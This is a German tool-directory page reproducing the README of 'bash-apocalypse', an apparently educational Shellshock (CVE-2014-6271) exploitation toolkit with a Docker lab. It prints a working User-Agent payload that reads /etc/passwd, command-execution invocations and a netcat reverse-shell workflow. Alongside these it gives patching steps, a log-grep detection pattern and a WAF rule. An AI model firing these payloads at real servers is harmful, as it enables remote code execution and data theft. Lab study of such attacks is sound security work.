Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
bash-apocalypse — Nachbildung von Shellshock (CVE-2014-6271) – die Bash-Sicherheitslücke, die Millionen von Servern gefährdete. Automatisiertes Exploitation-Toolkit + Burp-Suite-Methodik + Docker-Lab. Entwickelt für Sicherheitsforschung & Ausbildung. Offensives Sicherheits-Portfolioprojekt. | Kitploit
Tools/GitHubGitHub/mtaha-sec/bash-apocalypse
SchwachstellenscannerPayload-GenerierungExploitationIDS/IPS-UmgehungShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlFehlkonfiguration

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Lernen & Bildung
Labs & Praxis
GitHubmtaha-sec/bash-apocalypse

bash-apocalypse

Nachbildung von Shellshock (CVE-2014-6271) – die Bash-Sicherheitslücke, die Millionen von Servern gefährdete. Automatisiertes Exploitation-Toolkit + Burp-Suite-Methodik + Docker-Lab. Entwickelt für Sicherheitsforschung & Ausbildung. Offensives Sicherheits-Portfolioprojekt.

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Bash Apocalypse

Automatisiertes Exploitation-Toolkit für CVE-2014-6271 (Shellshock)

Severity CVSS Score

Ein vollständiges Sicherheitsforschungsprojekt, das die Shellshock-Schwachstelle demonstriert, die 2014 Millionen von Servern betraf. Enthält automatisiertes Scannen, Exploitation-Funktionen und defensive Empfehlungen.

Demo


Was ist Shellshock?

Shellshock (CVE-2014-6271) ist eine kritische Schwachstelle in der Bash-Shell, die Remote-Codeausführung durch Manipulation von Umgebungsvariablen ermöglicht. Sie wurde 2014 entdeckt, nachdem sie 22 Jahre lang existiert hatte, und betraf Millionen von Unix/Linux-Systemen weltweit.

So funktioniert es:

root@kitploit:~
# Normal: Bash exports functions as environment variables
my_function='() { echo "hello"; }'

# The bug: Bash continues parsing after the function definition
exploit='() { :;}; echo "PWNED"'  # The second command executes

Webserver, die CGI verwenden, übergeben HTTP-Header als Umgebungsvariablen an Bash, wodurch sie angreifbar werden:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Schnellstart

root@kitploit:~
# Clone and setup
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# Start vulnerable lab
docker-compose up -d

# Run exploit
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

Funktionen

Automatisierter Scanner

  • Findet angreifbare CGI-Endpunkte
  • Testet mehrere Injektionspunkte (User-Agent, Referer, Cookie)
  • Unterstützung für benutzerdefinierte Wordlists

Exploitation-Tool

  • Befehlsausführung mit Erfassung der Ausgabe
  • Automatisierte Reverse Shell
  • Mehrere Payload-Optionen

Laborumgebung

  • Docker-Setup mit einem Befehl
  • Isolierter, angreifbarer Server
  • Sichere Testumgebung

Verwendung

Nach Schwachstellen scannen

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

Befehle ausführen

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

Reverse Shell erhalten

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

Manuelle Exploitation (Burp Suite)

Schritt 1: Anfrage abfangen

Burp Intercept

Schritt 2: Payload injizieren

Exploitation

Ändern Sie den User-Agent-Header:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Schritt 3: Antwort beobachten

Reverse Shell

Der Server führt Ihren Befehl aus und gibt die Ausgabe zurück.


Technische Analyse

Angriffsablauf

root@kitploit:~
Client (Attacker)
    │
    │ HTTP Request with malicious User-Agent
    ▼
Web Server
    │
    │ Passes header as environment variable
    ▼
CGI Script
    │
    │ Spawns Bash process
    ▼
Bash Shell
    │
    │ Parses function + executes trailing commands
    ▼
Command Execution (RCE)

Grundursache

Wenn Bash auf eine Funktionsdefinition in einer Umgebungsvariable stößt:

  1. Es parst die Funktion: () { :;}
  2. Fehler: Es parst weiter und führt alles aus, was danach kommt
  3. Ergebnis: Beliebige Befehlsausführung

Verteidigung

Sofortige Gegenmaßnahmen

root@kitploit:~
# Update Bash
sudo apt-get update && sudo apt-get upgrade bash

# Disable CGI if not needed
sudo a2dismod cgi && sudo systemctl restart apache2

Erkennung

root@kitploit:~
# Check logs for exploitation attempts
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

WAF-Regel

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

Demonstrierte Fähigkeiten

  • Penetrationstests von Webanwendungen
  • Bash-Scripting und Automatisierung
  • Manipulation des HTTP-Protokolls
  • Docker-Containerisierung
  • Kenntnisse in Burp Suite
  • Sowohl offensive als auch defensive Sicherheit

Projektstruktur

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # Main tool
├── payloads.txt            # Test payloads
├── docker-compose.yml      # Lab setup
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

Rechtlicher Hinweis

Nur zu Bildungszwecken. Testen Sie ausschließlich Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis haben. Unbefugter Zugriff ist illegal.


Ressourcen

  • Details zu CVE-2014-6271
  • Cloudflare: Inside Shellshock
  • Übung: HackTheBox - Shocker

Entwickelt, um zu verstehen, wie Schwachstellen funktionieren und wie man sich gegen sie verteidigt. ;)

Tool herunterladen